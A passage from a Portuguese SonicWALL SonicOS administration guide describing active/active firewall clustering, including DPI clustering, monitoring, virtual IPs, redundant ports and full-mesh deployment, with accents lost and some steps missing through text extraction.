Suporte de RIP
O RIP suportado e, tal como o OSPF, ser executado nas interfaces habilitadas por RIP de
cada n de cluster. De uma perspectiva de roteamento, todos os ns de cluster aparecem
como roteadores paralelos, com o endereo IP virtual da interface do n do cluster. Em geral,
qualquer rede anunciada por um n ser anunciada por todos os outros ns.
Suporte de BGP
O BGP suportado em clusters e tambm ser exibido como roteadores de BGP paralelos
usando o endereo IP virtual da interface do n do cluster. Tal como acontece com o OSPF e
o RIP, as alteraes de configurao realizadas no n mestre sero aplicadas a todos os outros
ns do cluster. No caso do BGP, em que a configurao s pode ser aplicada atravs da CLI,
a configurao distribuda quando a configurao em execuo salva com o comando da
CLI write file.
Problemas de roteamento assimtrico em configuraes de cluster

Qualquer dispositivo de rede que executa a inspeo profunda de pacotes ou a atividade do
firewall estvel deve "ver" todos os pacotes associados a um fluxo de pacotes. Isso contrasta
com o roteamento tradicional de IP em que cada pacote em um fluxo pode tecnicamente ser
encaminhado ao longo de um caminho diferente, desde que chegue ao destino pretendido
os roteadores intervenientes no tm de ver cada pacote. Os roteadores dos dias de hoje
tentam encaminhar pacotes com um prximo salto consistente para cada fluxo de pacote, mas
isso se aplica somente a pacotes encaminhados em uma direo. Os roteadores no tentam
direcionar o trfego de retorno para o roteador de origem. Esse comportamento de roteamento
de IP apresenta problemas para um cluster de firewall, porque o conjunto de todos os ns de
cluster fornece um caminho para as mesmas redes. Os roteadores de encaminhamento de

pacotes para redes por meio do cluster podem escolher qualquer um dos ns do cluster como
o prximo salto. O resultado o roteamento assimtrico, no qual o fluxo de pacotes em uma
direo passa atravs de um n diferente daquele usado para o caminho de retorno. Isso far
com que o trfego seja descartado por um ou por dois ns de cluster, uma vez que nenhum
est a "ver" todo o trfego proveniente do fluxo.
Existem duas formas de evitar caminhos de roteamento assimtricos:
1. Projete todas as redes e todos os roteadores conectados ao cluster, de tal forma que o
encaminhamento de pacotes sempre resultar em caminhos simtricos relativamente aos
endereos IP virtuais usados no cluster.
2. Crie uma configurao de malha completa de regras NAT no cluster para que cada par de
interface tenha uma regra NAT que substitui o endereo IP de origem no pacote com o IP
virtual da interface de egresso. Essas regras devem ser as mesmas que as regras padro
criadas entre interfaces de zonas confiveis e no confiveis. Quando existem regras NAT
de malha completa, os caminhos de avano e recuo de fluxos que transitam no cluster
sempre fluiro atravs do mesmo n do cluster (ou do proprietrio atual dos endereos IP
virtuais primrios do n do cluster).
Pr-requisitos de Clustering ativo/ativo
Nota Alm dos requisitos descritos nesta seo, garanta a concluso dos pr-requisitos descritos
em Pr-requisitos de DPI ativa/em espera e ativa/ativa na pgina 1095.
Para Clustering ativo/ativo, so necessrias conexes fsicas adicionais:

Link de cluster ativo/ativo cada link de cluster ativo/ativo deve ter uma interface de 1
GB
A configurao de Clustering ativo/ativo pode incluir a configurao de portas redundantes e
IDs de grupo virtual. Os procedimentos so fornecidos nesta seo para ambas as tarefas na
seo Alta disponibilidade > Configuraes na pgina 1104.
Conectar as portas de AD para Clustering ativo/ativo

Para Clustering ativo/ativo, voc deve conectar fisicamente portas de AD designadas de todas
as unidades no cluster ativo/ativo mesma rede de camada 2.
A SonicWALL recomenda conectar todas as portas de AD designadas para o mesmo switch de
camada 2. Voc pode usar um switch dedicado ou simplesmente usar algumas portas em um
switch existente na sua rede interna. Todas essas portas de switches devem ser configuradas
para permitir que o trfego de camada 2 flua livremente entre elas.
No caso de uma implantao de Cluster ativo/ativo de duas unidades, em que cada um dos
dois ns do cluster tm apenas um nico dispositivo, voc pode conectar as portas de AD
diretamente entre elas usando um cabo transversal. No necessrio nenhum switch nesse
caso.
O SVRRP (SonicWALL Virtual Router Redundancy Protocol Protocolo de redundncia de
roteador virtual da SonicWALL) usa esta conexo de porta de AD para enviar mensagens de
estado de monitoramento e gerenciamento de n de cluster. As mensagens de gerenciamento
de SVRRP so iniciadas no n mestre e as informaes de monitoramento so comunicadas
de cada dispositivo no cluster.
A conexo de porta de AD tambm usada para sincronizar a configurao do n mestre para
outros ns de cluster na implantao. Isso inclui atualizaes de firmware ou assinatura,
polticas de VPN e NAT e outras configuraes.

Conectar interfaces de porta redundante
Voc pode atribuir uma interface fsica no utilizada como uma porta redundante a uma
interface fsica configurada denominada "interface primria". Em cada n de cluster, cada par
de porta primria e redundante deve estar conectado fisicamente ao mesmo switch ou,
preferencialmente, a switches redundantes na rede.
Nota Como todos os ns de cluster compartilham a mesma configurao, cada n deve ter as
mesmas portas redundantes configuradas e conectadas aos mesmos switches.
Para usar Clustering ativo/ativo, voc deve registrar todos os dispositivos SonicWALL no
cluster no MySonicWALL. Os dois dispositivos em cada par de AD tambm devem ser
associados como AD Primria e AD Secundria no MySonicWALL. Isto , associe os dois
dispositivos no par de AD para o n 1 do cluster, em seguida associe os dispositivos no par de
AD para o n 2 do cluster e assim sucessivamente para quaisquer outros ns do cluster.
A tabela a seguir mostra os requisitos de licenciamento para Clustering ativo/ativo e outros
recursos de Alta disponibilidade.
Alta disponibilidade Clustering A/

Plataforma estvel A DPI A/A
NSA 2600 Licena expandida ou N/D N/D
licena de AD
NSA 3600 Licena expandida ou N/D N/D
licena de AD
NSA 4600 Includo N/D N/D
NSA 5600 Includo Expandida Expandida
01-SSC-4480 A7014414
NSA 6600 Includo Expandida Expandida
01-SSC-4481 A7014415
SM 9200 Includo Includo Includo

Configurar o Clustering ativo/ativo
Configurar a alta disponibilidade de clustering ativo/ativo na pgina 1129
Configurar Monitoramento de alta disponibilidade de Clustering ativo/ativo na pgina 1132
Configurar alta disponibilidade de clustering de DPI ativo/ativo na pgina 1134
Configurar VPN e NAT com Clustering ativo/ativo na pgina 1136
Configurar a alta disponibilidade de clustering ativo/ativo

A alta disponibilidade de clustering ativo/ativo permite a configurao de at quatro ns de
cluster de AD para failover e compartilhamento de carga. Cada n pode conter um nico
dispositivo ou um par de AD.
Para configurar a alta disponibilidade de clustering ativo/ativo:
Etapa 1 Faa logon na unidade Primria do n do cluster mestre e navegue at a pgina Alta
disponibilidade > Configuraes. A guia Geral exibida.

Etapa 2 No menu suspenso Modo, selecione Clustering ativo/ativo.
Etapa 3 Selecione a opo Habilitar sincronizao estvel.
Etapa 4 Selecione a opo Gerar/substituir configuraes e firmware do secundrio ao atualizar
o firmware para criar automaticamente um secundrio das definies de firmware e
configurao quando voc carregar o novo firmware para o dispositivo. Como o n mestre
sincroniza o novo firmware para outros dispositivos no cluster, as unidades secundrias so
criadas nesses dispositivos.
Etapa 5 Clique na guia Dispositivos e ns de AD para configurar as informaes de cluster ativo/
ativo.

Etapa 6 Na tabela, digite os nmeros de srie dos dispositivos em cada n de cluster.
Etapa 7 Insira a classificao do N 1 do cluster para cada Grupo virtual nos campos Grupo virtual X
Classificao direita dos nmeros de srie. Por padro, o N 1 do cluster o Proprietrio
do Grupo 1 e, normalmente, est classificado como Em espera para o Grupo 2. Para excluir
um dispositivo de um cluster, selecione Nenhum para o Grupo virtual X Classificao.
Etapa 8 Na segunda linha, insira a classificao do N 2 do cluster para cada Grupo virtual nos campos
Grupo virtual X Classificao direita dos nmeros de srie.
Etapa 9 Clique na guia Interfaces de AD. Selecione a interface que voc deseja para a interface Link
de cluster ativo/ativo. Essa interface ser usada para transferir dados entre as duas unidades
durante o processamento de ativo/ativo. Somente as interfaces no atribudas e disponveis
aparecem na lista.
reinicializar.
Etapa 11 V para a pgina Alta disponibilidade > Monitoramento e siga as etapas em Configurar
Monitoramento de alta disponibilidade de Clustering ativo/ativo na pgina 1132.
Etapa 12 V para a pgina Alta disponibilidade > Avanado e siga as etapas em Alta disponibilidade
> Avanado na pgina 1109.
Etapa 13 V para a pgina Rede > Interfaces para verificar se voc configurou com xito as interfaces
ativas/ativas desejadas.
Etapa 14 V para a pgina Alta disponibilidade > Status para verificar suas configuraes para
Clustering ativo/ativo.

Configurar Monitoramento de alta disponibilidade de Clustering ativo/ativo
As tarefas de configurao na pgina Alta disponibilidade > Monitoramento so realizadas
Essas configuraes afetam apenas o par de AD no n do cluster que est selecionado na
parte superior da pgina.
Para definir os endereos IP de gerenciamento de LAN independentes e configurar

monitoramento de interface fsico e/ou lgico, execute as seguintes etapas:
Etapa 1 Faa logon como administrador na interface de gerenciamento do SonicOS no n mestre.

Etapa 2 No painel de navegao esquerda, navegue at Alta disponibilidade > Monitoramento.
Etapa 3 No lado superior direito da pgina, selecione o n para configurar na lista suspensa.
Etapa 4 Clique no cone Configurar de uma interface na LAN, como X0.
Etapa 5 Para habilitar a deteco de link entre as interfaces de AD designadas nas unidades Primria
e Secundria, deixe a caixa de seleo Habilitar monitoramento de interface fsica
marcada.

Etapa 6 No campo Endereo IP primrio, digite o endereo IP de gerenciamento de LAN exclusivo da
unidade Primria.
Etapa 7 No campo Endereo IP secundrio, digite o endereo IP de gerenciamento de LAN exclusivo
da unidade Secundria.
Etapa 8 Marque a caixa de seleo Permitir gerenciamento em endereo IP primrio/secundrio.
Quando essa opo est habilitada para uma interface, um cone verde aparece na coluna
Gerenciamento da interface na tabela Configuraes de monitoramento na pgina Alta
disponibilidade > Monitoramento. O gerenciamento s permitido em uma interface quando
essa opo est habilitada.
Etapa 9 No campo Endereo IP de lgica/investigao, digite o endereo IP de um dispositivo
downstream na rede LAN que deve ser monitorada para conectividade. Normalmente, dever
ser um servidor ou roteador downstream. (Se a investigao for desejada no lado da WAN,
deve ser usado um dispositivo upstream.) Os dispositivos Primrio e Secundrio efetuaro
ping regularmente a este endereo IP de investigao. Se ambos conseguirem efetuar ping
com xito ao destino, no ocorrer failover. Se nenhum conseguir efetuar ping ao destino com
xito, no ocorre failover, pois presume-se que o problema est relacionado com o destino e
no com os firewalls. Se um dispositivo conseguir efetuar ping ao destino e o outro no
conseguir, ocorrer failover no dispositivo que consegue efetuar ping ao destino.
Os campos Endereo IP primrio e Endereo IP secundrio devem ser configurados com
endereos IP independentes em uma interface de LAN, como X0 (ou uma interface de WAN,
como X1, para investigao na WAN), para permitir que a investigao lgica funcione
corretamente.
Etapa 11 Para configurar o monitoramento em qualquer uma das outras interfaces, repita as etapas
acima.
Etapa 12 Quando terminar a configurao do monitoramento de alta disponibilidade para o n de cluster
selecionado, clique em Aplicar. Em seguida, selecione um n de cluster diferente e repita as
etapas de configurao e, em seguida, clique em Aplicar.
Para obter informaes adicionais sobre como verificar a configurao, consulte Verificar a
configurao de Clustering ativo/ativo na pgina 1139.

Configurar alta disponibilidade de clustering de DPI ativo/ativo
A alta disponibilidade de clustering de DPI ativo/ativo permite a configurao de at quatro ns
de cluster de AD para failover e compartilhamento de carga, em que os ns balanceiam a carga
do aplicativo de servios de segurana de Inspeo profunda de pacotes (DPI) para trfego de
rede.
Para os Links de cluster e os Links de controle, cada unidade no N 1 do cluster conectada
a cada unidade no n par (N 2 do cluster). Como prtica recomendada, use o mesmo conjunto
de interfaces em cada unidade, em cada n. (Por exemplo, conecte a X8 em uma unidade
X8 na unidade par e realize o mesmo se voc estiver usando a X9 ou a X10, etc. No entanto,
no h nenhuma restrio relativamente s portas a usar.
Figura 25 Alta disponibilidade de clustering de DPI ativo/ativo
Internet

X1 X1
Primary Primary
Cluster Link1
10GE 1GE 1GE
Xn Xn 10GE 1GE 1GE
SDHC SDHC
M0 M0
ALARM
BYPASS ALARM
BYPASS
STATUS STATUS
TEST TEST

X19 X17 X15 X13 X11 X9 X7 X5 X3 X1 SonicWALL SuperMassive 9200 PWR 1 PWR 2
X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Xn Xn
CONSOLE MGMT CONSOLE MGMT
HA Data A/A DPI HA Control Co HA Data A/A DPI HA Control

nt
Interface ro Interface
X3
Interface Interface X3 lL
ink Interface Interface
1
Xn Xn Xn Xn Xn Xn
2
ink
lL
ro
nt
Xn Xn Xn Co Xn Xn Xn
Xn Xn
X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0
Cluster Link 2 X18
10GE
X16 X14 X12
1GE
X10 X8 X6 X4
1GE
X2 X0
SDHC
M0
ALARM
TEST
BYPASS
STATUS
Xn Xn SDHC
M0
ALARM
TEST
BYPASS
STATUS

PWR 1 PWR 2
PWR 1 PWR 2
MGMT X19 X17 X15 X13 X11 X9 X7 X5 X3 X1
Secondary Secondary
X0 X0
Internal Network
Xn

Para configurar a alta disponibilidade de clustering de DPI ativo/ativo:
Etapa 1 Faa logon na unidade Primria do n do cluster mestre e navegue at a pgina Alta
disponibilidade > Configuraes. A guia Geral exibida.
Se voc tiver fisicamente conectado a Interface de DPI ativa/ativa, conforme descrito em
Conectando fisicamente seus dispositivos na pgina 1096, voc est pronto para configurar a
DPI ativa/ativa na interface de gerenciamento do SonicOS.
Etapa 2 No menu suspenso Modo, selecione Clustering de DPI ativo/ativo.
Etapa 3 A opo Habilitar sincronizao estvel automaticamente habilitada para Clustering de
DPI ativo/ativo.
Etapa 4 Marque a caixa de seleo Gerar/substituir configuraes e firmware do secundrio ao
atualizar o firmware para criar automaticamente um secundrio das definies de firmware e
configurao quando voc carregar o novo firmware para o dispositivo. Como o n mestre
sincroniza o novo firmware para outros dispositivos no cluster, os secundrios sero criados
nesses dispositivos.
Etapa 5 Clique na guia Dispositivos AD para configurar as informaes de cluster ativo/ativo.
Etapa 6 Para a opo AD Secundria na parte superior da guia, selecione Interno se o dispositivo
secundrio configurado fizer parte do n do cluster deste dispositivo. Selecione Externo se o
dispositivo secundrio configurado fizer parte de um n de cluster diferente.
Etapa 7 Na tabela, digite os nmeros de srie dos dispositivos em cada n de cluster.
Etapa 8 Insira a classificao do N 1 do cluster para cada Grupo virtual nos campos Grupo virtual X
Classificao direita dos nmeros de srie. Por padro, o N 1 do cluster o Proprietrio
do Grupo 1 e, normalmente, est classificado como Em espera para o Grupo 2. Para excluir
um dispositivo de um cluster, selecione Nenhum para o Grupo virtual X Classificao.
Etapa 9 Na segunda linha, insira a classificao do N 2 do cluster para cada Grupo virtual nos campos
Grupo virtual X Classificao direita dos nmeros de srie.
Etapa 10 Clique na guia Interfaces de AD. Selecione a interface da Interface de controle AD. Esta
opo fica acinzentada se o dispositivo detectar que a interface j est configurada.
Etapa 11 Selecione a interface para a Interface de DPI ativa/ativa. Esta opo fica acinzentada se o
Etapa 12 Selecione a Interface de DPI ativa/ativa. Essa interface ser usada para transferir dados
entre as duas unidades durante o processamento de DPI ativa/ativa. Somente as interfaces
no atribudas e disponveis aparecem na lista.
Etapa 13 Selecione a interface Link de cluster ativo/ativo.
reinicializar.
Etapa 15 V para a pgina Alta disponibilidade > Monitoramento e siga as etapas em Configurar
Monitoramento de alta disponibilidade de Clustering ativo/ativo na pgina 1132.
Etapa 16 V para a pgina Alta disponibilidade > Avanado e siga as etapas em Alta disponibilidade
> Avanado na pgina 1109.
Etapa 17 V para a pgina Rede > Interfaces para verificar se voc configurou com xito as interfaces
ativas/ativas desejadas.
Etapa 18 V para a pgina Alta disponibilidade > Status para verificar suas configuraes para
Clustering ativo/ativo.

Configurar VPN e NAT com Clustering ativo/ativo
Devem ser executadas consideraes extra ao configurar os seguintes recursos em um
ambiente de Clustering ativo/ativo:
Configurar VPN com Clustering ativo/ativo na pgina 1136
Configurar uma poltica de NAT com Clustering ativo/ativo na pgina 1138
Configurar VPN com Clustering ativo/ativo

A configurao de poltica de VPN requer associao a um Grupo virtual quando executado no
modo de Clustering ativo/ativo. Na janela Poltica de VPN, as guias Rede e Avanado
possuem novas opes de configurao para a criao dessa associao.
Na guia Rede, esto disponveis os objetos de endereos do Grupo virtual para a opo
Escolher rede local na lista. Esses objetos de endereos de Grupo virtual so criados pelo
SonicOS quando endereos IP virtuais so adicionados e so excludos quando o IP virtual
excludo.

Se estiver a criar uma Poltica de VPN para uma rede remota, tambm podero estar
disponveis objetos de endereo de Grupo Virtual. Por exemplo, este grfico mostra um com o
nome personalizado Ativo-Ativo-Lan-Host-1.
Na guia Avanado, voc pode selecionar o nmero de Grupo virtual para a configurao
Grupo de poltica de VPN. O padro Grupo virtual 1.

Configurar uma poltica de NAT com Clustering ativo/ativo
Durante a execuo no modo de Clustering ativo/ativo, a configurao da poltica de NAT inclui
configuraes de Grupo virtual. As polticas de NAT padro so criadas pelo SonicOS quando
endereos IP virtuais so adicionados e so excludos quando o IP virtual excludo. Voc
pode especificar um Grupo virtual ou selecionar Qualquer durante a criao de polticas de
NAT personalizadas. Este grfico mostra a poltica de NAT automaticamente criada para o
Grupo virtual 2 na interface X1.
Este grfico mostra as selees para a opo Grupo virtual na janela Adicionar poltica de
NAT ao criar uma poltica de NAT personalizada.

Verificar a configurao de Clustering ativo/ativo
Esta seo descreve vrios mtodos de verificao da configurao correta do Clustering
ativo/ativo e DPI ativa/ativa. Veja o seguinte:
Comparar a atividade da CPU em dispositivos em um cluster na pgina 1139
Verificar configuraes na pgina Alta disponibilidade > Status na pgina 1139
Parmetros adicionais no TSR na pgina 1141
Respostas a correspondncias de DPI na pgina 1141
Registro em log na pgina 1142
Comparar a atividade da CPU em dispositivos em um cluster

Quando a DPI ativa/ativa est habilitada em um par de AD estvel, voc pode observar uma
alterao na utilizao da CPU em dispositivos no par de AD. A atividade da CPU fica inativa
na unidade ativa e ativada na unidade em espera.
Voc pode visualizar a utilizao da CPU no Monitor de vrios ncleos. No firewall ativo do n
mestre, v para a pgina Sistema > Diagnstico e selecione Monitor de vrios ncleos para
mostrar a atividade de todos os dispositivos no Cluster ativo/ativo.
Ao visualizar o Monitor de vrios ncleos em uma unidade ativa no cluster, todos os firewalls
no cluster so exibidos. No entanto, se voc efetuar logon no endereo IP individual de uma
unidade em espera no cluster, a pgina Monitor de vrios ncleos exibe somente o uso do
ncleo para os dois firewalls nesse par de AD especfico.
Nota Para ver o uso do ncleo para todos os firewalls no cluster, a SonicWALL recomenda
visualizar a pgina Monitor de vrios ncleos na unidade ativa do n mestre.
Verificar configuraes na pgina Alta disponibilidade > Status

A pgina Alta disponibilidade > Status fornece o status de todo o Cluster ativo/ativo e de
cada N de cluster na implantao.
O status do n de Clustering ativo/ativo exibido na parte superior da pgina e mostra valores
para as seguintes configuraes:
Status do n Ativo ou Em espera para cada n no cluster
Primrio A/A licenciado Sim ou No para cada n no cluster
Secundrio A/A licenciado Sim ou No para cada n no cluster
Grupos virtuais de propriedade Exibe o nmero do Grupo virtual pertencente a cada
n no cluster. Voc pode verificar esses valores para determinar o status do proprietrio
aps um failover.

A tabela Status do n de clustering ativo/ativo mostrada abaixo.
Na seo inferior da pgina, mostrada abaixo, a tabela Status de alta disponibilidade exibe as
configuraes e o status de AD de cada n no cluster.

Parmetros adicionais no TSR
possvel verificar se a DPI ativa/ativa est configurada corretamente no seu par de AD
estvel gerando um Relatrio do suporte tcnico na pgina Sistema > Diagnstico. Os
seguintes parmetros de configurao devem aparecer com seus valores corretos no Relatrio
do suporte tcnico:
Habilitar DPI ativa/ativa
Configurao de interface de DPI ativa/ativa
Para gerar um TSR para essa finalidade:
Etapa 1 Faa logon no par de AD estvel usando o endereo IP compartilhado.

Etapa 2 Navegue at a pgina Sistema > Diagnstico.
Etapa 3 Em Relatrio do suporte tcnico, clique em Baixar relatrio.
Respostas a correspondncias de DPI

Respostas ou aes so sempre enviadas da unidade ativa do par de AD estvel executando
a DPI ativa/ativa quando forem encontradas correspondncias de DPI no trfego de rede.
Observe que isso no indica que todo o processamento foi executado na unidade ativa.
A inspeo profunda de pacotes detecta trfego de rede que corresponde a assinaturas de
IPS, anexos de vrus, polticas de regras de aplicativos e outros tipos de malware. Quando
feita uma correspondncia, o SonicOS executa uma ao como descartar o pacote ou redefinir
a conexo TCP.
Algumas aes de correspondncia de DPI injetam pacotes TCP adicionais no fluxo existente.
Por exemplo, quando uma sesso SMTP transporta um anexo com vrus, o SonicOS envia ao
cliente SMTP um cdigo de resposta de erro "552", com uma mensagem informando que "o
anexo do e-mail contm um vrus". Uma redefinio de TCP segue o cdigo de resposta de
erro e a conexo encerrada.
Esses pacotes TCP adicionais so gerados em resultado do processamento da DPI no firewall
em espera. Os pacotes gerados so enviados para o firewall ativo atravs da Interface de DPI
ativa/ativa e so enviados do firewall ativo como se o processamento tivesse ocorrido no
firewall ativo. Isso garante uma operao contnua e parece que o processamento de DPI foi
realizado no firewall ativo.

Registro em log
Se a DPI ativa/ativa estiver habilitada e o processamento de DPI no firewall em espera resultar
em uma ao de correspondncia de DPI conforme descrito acima, a ao ser registrada em
log na unidade ativa do par de AD estvel e no na unidade em espera onde foi detectada a
ao de correspondncia. Isso no indica que todo o processamento foi executado na unidade
ativa.
Os eventos de log relacionados com alta disponibilidade podem ser visualizados na pgina
Log > Visualizar.
Monitoramento da Alta disponibilidade do IPv6

O Monitoramento da Alta disponibilidade (AD) do IPv6 implementado como uma extenso do

Monitoramento da AD no IPv4. Depois de configurar o Monitoramento da AD para o IPv6, os
dispositivos primrios e de backup podem ser gerenciados a partir do endereo de
monitoramento do IPv6 e a Investigao do IPv6 capaz de detectar o status da rede dos
pares da AD.
Os botes de opo do IPv6 e do IPv4 exibem a pgina Alta disponibilidade > Monitoramento;
alterne as duas exibies para uma fcil configurao das duas verses do IP:

Como a pgina de configurao do Monitoramento da AD do IPv6 herdada do IPv4, os
procedimentos de configurao so quase idnticos. Basta selecionar o boto de opo do
IPv6 e consultar Viso geral da Alta disponibilidade na pgina 1087 para obter os detalhes de
configurao.
Considere o seguinte ao configurar o Monitoramento da AD do IPv6:
As caixas de seleo Monitoramento de link/fsico e MAC virtual ficam esmaecidas pois
so propriedades da camada 2. Em outras palavras, como as propriedades so usadas
pelo IPv4 e IPv6, o usurio precisa configur-las na pgina de monitoramento do IPv4.
O endereo IPv6 primrio/de backup deve estar na mesma sub-rede da interface e no
pode ser igual ao IP global e ao IP-Local-do-Link do dispositivo primrio/de backup.
Se o IP de monitoramento primrio/de backup estiver definido como (no ::), ento eles
no podem ser iguais.
Se a caixa de seleo Gerenciamento estiver habilitada, ento o IP de monitoramento
primrio/de backup no pode ser indeterminado (ou seja ::).
Se a caixa de seleo da investigao estiver habilitada, ento o IP da investigao no
pode ser indeterminado.
Definindo configuraes da interface e DHCP de rede

Quando o Clustering ativo/ativo est habilitado, o servidor DHCP interno do SonicOS est
desativado e no pode ser habilitado. As redes que precisam de um servidor DHCP podem
usar um servidor DHCP externo. O servidor DHCP do SonicOS deve ser desabilitado na
interface de gerenciamento antes de habilitar o Clustering ativo/ativo e todos os escopos de
concesso de servidor DHCP devem ser excludos.
Na pgina Rede > Interfaces, voc pode configurar endereos IP virtuais adicionais para
interfaces em um Grupo virtual e portas redundantes para interfaces.
Para obter informaes a realizao dessas tarefas, consulte as seguintes sees:
Desabilitar o servidor DHCP do SonicOS na pgina 1143
Configurar endereos IP virtuais na pgina 1144
Configurar portas redundantes na pgina 1146
Desabilitar o servidor DHCP do SonicOS

Para desabilitar o servidor DHCP do SonicOS e excluir todos os escopos de concesso de
servidor DHCP, execute as seguintes etapas:
Etapa 1 Faa logon na unidade Primria do n de cluster e navegue at a pgina Rede > Servidor
DHCP.
Etapa 2 Desmarque a caixa de seleo Habilitar servidor DHCP.
Etapa 3 Em Escopos de concesso de servidor DHCP, marque a caixa de seleo no canto superior
esquerdo do ttulo da tabela para selecionar todos os escopos de concesso na tabela.

Etapa 4 Clique no boto Excluir tudo.
Etapa 6 Clique em Aceitar na parte superior da pgina Rede > Servidor DHCP.
Configurar endereos IP virtuais

Quando o Clustering ativo/ativo for habilitado pela primeira vez, os endereos IP configurados
para as interfaces nesse firewall so automaticamente convertidos em endereos IP virtuais
para o Grupo virtual 1. Assim, o Grupo virtual 1 incluir endereos IP virtuais para X0, X1 e
quaisquer outras interfaces que so configuradas e atribudas a uma zona.
O Clustering ativo/ativo requer configurao adicional de endereos IP virtuais para Grupos
virtuais adicionais. Voc pode atribuir vrios endereos IP virtuais para cada interface, um por
Grupo virtual. Cada endereo IP virtual adicional est associado a um dos outros Grupos
virtuais no cluster. Cada interface pode ter at um mximo de quatro endereos IP virtuais. As
interfaces VLAN tambm podem ter at quatro endereos IP virtuais.
Nota Um pacote no pode ser encaminhado em uma interface se um endereo IP virtual no

estiver configurado nele para o Grupo Virtual manipulando esse fluxo de trfego.

Para configurar um endereo IP virtual em uma interface:
Etapa 1 Faa logon na unidade Primria do n do cluster e navegue at a pgina Rede > Interfaces.
Etapa 2 Na tabela Configuraes de interface, clique no cone de configurao da interface que voc
deseja configurar.
Etapa 3 Na janela Editar interface, digite o endereo IP virtual no campo Endereo IP (Grupo virtual
X), em que "X" representa o nmero do grupo virtual.
Nota O novo endereo IP virtual deve estar na mesma sub-rede, como qualquer endereo IP
virtual existente para essa interface.
Etapa 4 Clique em OK. O endereo IP virtual configurado exibido na tabela Configuraes de

interface.

Configurar portas redundantes
As portas redundantes podem ser usadas com Clustering ativo/ativo. Voc pode atribuir uma
interface fsica no utilizada como uma porta redundante a uma interface fsica configurada
denominada "interface primria". Se houver uma falha de link fsico na interface primria, a
interface redundante pode continuar a processar o trfego sem qualquer interrupo. Uma
vantagem desse recurso o fato de no ser necessrio efetuar um failover do dispositivo no
caso de uma falha de link fsica.
Voc pode configurar uma porta redundante na guia Avanado da janela Editar interface. O
campo Porta redundante s est disponvel quando o Clustering ativo/ativo est habilitado.
mesmas portas redundantes configuradas e conectadas aos mesmos switches.
Para obter informaes sobre portas redundantes e switches redundantes fisicamente

conectados, consulte Active/Active Clustering Full Mesh Deployment Technote (Nota tcnica
de implantao de malha completa de clustering ativo/ativo).
Para configurar uma porta redundante para uma interface:
Etapa 1 Faa logon na unidade Primria do n do cluster e navegue at a pgina Rede > Interfaces.
Etapa 2 Na tabela Configuraes de interface, clique no cone de configurao da interface primria
para a qual voc deseja criar uma porta redundante.

Por exemplo, clique no cone de configurao para X2.
Etapa 3 Na janela Editar interface, clique na guia Avanado.
Etapa 4 No campo Porta redundante, selecione a porta redundante na lista suspensa. Somente as
interfaces no utilizadas esto disponveis para seleo.
Por exemplo, selecione X4 para a porta redundante.

A interface selecionada ficar acinzentada na tabela Configuraes de interface. Uma nota
indica que uma porta redundante e lista a interface primria. A interface tambm aparece no
campo Porta redundante na janela Editar interface da porta primria.
Nota As portas primria e redundante devem estar conectadas fisicamente ao mesmo switch ou,
Etapa 6 Em cada n de cluster, replique as conexes fsicas redundantes usando os mesmos nmeros
de interface para as portas primria e redundante. Todos os ns de cluster compartilham a
mesma configurao que o n mestre.
Malha completa de clustering ativo/ativo

Viso geral de malha completa de clustering ativo/ativo na pgina 1148
Configurar a malha completa de clustering ativo/ativo na pgina 1150
Configurar a implantao de 2 unidades de malha completa de cluster ativo/ativo na
pgina 1154
Viso geral de malha completa de clustering ativo/ativo

A configurao de malha completa de clustering ativo/ativo um aprimoramento da opo de
configurao de clustering ativo/ativo e impede pontos de falha na rede. Todos os firewalls e
outros dispositivos de rede so usados como parceiros para redundncia completa. A malha
completa garante que no h pontos de falha em sua implantao, quer seja um dispositivo
(firewall/switch/roteador) ou um link. Cada dispositivo ligado duas vezes aos dispositivos
conectados. O Clustering ativo/ativo com malha completa fornece o nvel mais alto de
disponibilidade possvel com alto desempenho.
Nota Os roteadores na rede upstream do firewall devem ser pr-configurados para Protocolo de
redundncia de roteador virtual (VRRP).
Sobre implantaes de malha completa

A configurao de malha completa de clustering ativo/ativo uma melhoria para a opo de
configurao de clustering ativo/ativo e fornece o nvel mais alto de disponibilidade possvel
com alto desempenho. As implantaes de malha completa fornecem um nvel muito alto de
disponibilidade da rede, pois todos os dispositivos tm um ou mais parceiros redundantes,
incluindo roteadores, switches e dispositivos de segurana. Cada dispositivo ligado duas
vezes aos dispositivos conectados para que no existam pontos de falha em toda a rede. Por
exemplo, cada firewall da SonicWALL usa portas redundantes para se conectar duas vezes a
cada dispositivo de rede.

Nota As implantaes de malha completa exigem que a Redundncia de portas esteja habilitada
e implementada.
Benefcios da malha completa de clustering ativo/ativo

A seguir encontram-se os principais benefcios desta configurao de implantao:
Nenhum ponto nico de falha na rede principal: Em uma implantao de malha
completa de clustering ativo/ativo, no h nenhum ponto de falha em toda a rede principal,
no apenas para os firewalls. Um caminho alternativo para o fluxo de trfego est sempre
disponvel caso haja falhas simultneas de switch, roteador, firewall em um caminho,
fornecendo assim os nveis mais altos de disponibilidade.
Redundncia de portas: A malha completa de clustering ativo/ativo utiliza redundncia de
portas alm da redundncia de AD em cada n de cluster e a redundncia de nvel de n
no cluster. Com a redundncia de portas, um link de backup assumir de maneira
transparente se a porta primria falhar. Isso evita a necessidade de failover no nvel do
dispositivo.
Portas redundantes e switches redundantes

As portas redundantes podem ser usadas com Clustering ativo/ativo. Se uma porta tiver uma
falha, o trfego tratado diretamente atravs da porta redundante sem causar um failover de
AD ou ativo/ativo. O campo Porta redundante na pgina Rede > Interfaces > Editar interface
fica disponvel quando o Clustering ativo/ativo est habilitado.
Ao configurar uma porta redundante, a interface deve estar no utilizada, isto , no atribuda
a nenhuma zona. As duas portas devem estar fisicamente conectadas ao mesmo switch ou,
mesmas portas redundantes configuradas e conectadas ao(s) mesmo(s) switch(es).
Enquanto todos os ns do cluster estiverem ativos e processando trfego normalmente, as

portas redundantes permanecem em espera e ficam prontas para uso se a porta parceira ficar
inativa por qualquer motivo. Se um n de cluster ficar inativo, causando um failover ativo/ativo,
a porta redundante no n de cluster restante disponibilizada de imediato para utilizao, para
manipular o trfego para o Grupo virtual que pertencia ao n com falha. Isso permite o
compartilhamento de carga.
Por exemplo, digamos que temos uma implantao na qual o Grupo virtual 1 da propriedade
do N 1 de cluster e o Grupo virtual 2 da propriedade do N 2 de cluster. Os Ns de cluster
esto configurados com portas redundantes, X3 e X4. Nenhum trfego enviado em X4
enquanto todos os ns esto funcionando corretamente. Se o N 2 de cluster ficar inativo, o
Grupo virtual 2 tambm pertencer ao N 1 de cluster. Neste ponto, a porta redundante X4
